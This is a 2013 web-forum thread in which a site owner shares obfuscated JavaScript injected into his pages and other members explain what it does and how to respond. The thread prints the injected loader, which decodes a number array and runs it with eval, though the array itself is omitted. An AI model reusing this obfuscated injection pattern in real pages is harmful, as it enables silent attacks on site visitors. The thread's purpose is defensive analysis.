homepage Welcome to WebmasterWorld Guest from 54.145.182.50
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member

Home / Forums Index / Code, Content, and Presentation / JavaScript and AJAX
Forum Library, Charter, Moderator: open

JavaScript and AJAX Forum

    
Code hacked into our pages
Anyone have any idea what it was trying to do?
MikeNoLastName

WebmasterWorld Senior Member 10+ Year Member



 
Msg#: 4534140 posted 11:59 pm on Jan 7, 2013 (gmt 0)
Someone recently hacked into our server and inserted the following code into pretty much random locations on every .htm page on our site via some automated method. Can't see any side effects. Any idea what they were trying to do, so we can check if there was any further harm done or what to watch for?
<!--84c0a7-->
<script type="text/javascript" language="javascript" >
try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["createElement"]("span"[smilestopper]);}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=[ LONG SEQUENCE OF TWO CHAR QUOTED NUMBER LETTER COMBINATIONS... NOT HEX CODE ];h=2;s="";if(zxc)
{for(j=0;j-456!=0;j++)
{k=j;s+=String.fromCharCode(parseInt(n[j],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}</script><!--/84c0a7-->

 

swa66

WebmasterWorld Senior Member swa66 us a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 4534140 posted 12:17 am on Jan 8, 2013 (gmt 0)

That's typical obfuscated code used by hackers. In essence the script calculates z from that n and then the eval(z) attacks your visitors.

Now to know what the script tried: you'd have to deobfuscate it. Usually the easiest is to take the obfuscated script on a sacrificial machine (read: virtual machine taht you copy and wipe afterwards in case it does execute too much) and replace the eval near the end with an alert and run it: it'll show what it tried to execute.

This kind of thing is not without danger: most of those will exploit the browser or some plugin, or load next stages that will eventually do that depending on the browser type and version detected.

In essence the right thing to do:
- consider all your machines that visited your website or were used to manage the content on your website as hacked till proven otherwise - note: an AV scan is no proof.
- find out how they got in (that's not in this script), it's most likely something else like SQL injection, SSH, ... if you cannot find it (hackers that know what they do wipe their traces): you're in for a lot of work as you now need a full security audit to find vulnerabilities and correct them - if you do not do this it will only come back again and again and again.
- fix security of your server to prevent future break-ins
- figure out what the script they put on every page of your site actually did
- warn visitors that you got hacked and tell them what they were subjected too (esp if you have recurring visitors)

MikeNoLastName

WebmasterWorld Senior Member 10+ Year Member



 
Msg#: 4534140 posted 4:22 am on Jan 8, 2013 (gmt 0)

Oh [bleep]!
Thanks. It looks like it crawled through all the directories automatically, sequentially over a period of about an hour. It only touched the one domain on our server as far as we can tell. They must not have been too good of hackers, as they did not reset back the times on the changed files, which is how I discovered it. Otherwise it may have been months before we discovered it.

I had a nasty virus on my computer last week which I finally got rid of with some help, but this just happened yesterday.

lucy24

WebmasterWorld Senior Member lucy24 us a WebmasterWorld Top Contributor of All Time Top Contributors Of The Month



 
Msg#: 4534140 posted 8:12 am on Jan 8, 2013 (gmt 0)

for(j=0;j-456!=0;j++)

Holy ###. They couldn't just say

do
{ blah, blah }
until (heat-death of the universe)


?!

parseInt(n[j],12*2+2)

:: counting on fingers ::
base 26? Each letter is a digit?

I merrily inserted javascript into one site for almost two years before I got bored and said Here I Am. But they'd left the door standing wide open; the technique would never have worked in a normal site. (Like, say, yours or even mine. Trust me on this.)

MikeNoLastName

WebmasterWorld Senior Member 10+ Year Member



 
Msg#: 4534140 posted 8:41 am on Jan 8, 2013 (gmt 0)

I believe there were probably exactly 456 (plus or minus) items in the "LONG SEQUENCE OF TWO CHAR QUOTED NUMBER LETTER COMBINATIONS", so yeah that's the way they stepped through them up to 456. The first few terms are: "1e","3o","4d","46","3l","4c"

I was thinking the other variable names may have been a clue to the writer, but zxc and asdg are basically keyboard neighbors. Personally, I'm a UNIX C programmer (from before there was a C++) and Windows and JS, as similar as it is, are not my forte.

As far as coming back, so far so good. I was afraid they may have hidden a cron job to reset them every night at the same time or a random time (how I would have done it :), but nothing so far.

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Code, Content, and Presentation / JavaScript and AJAX
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved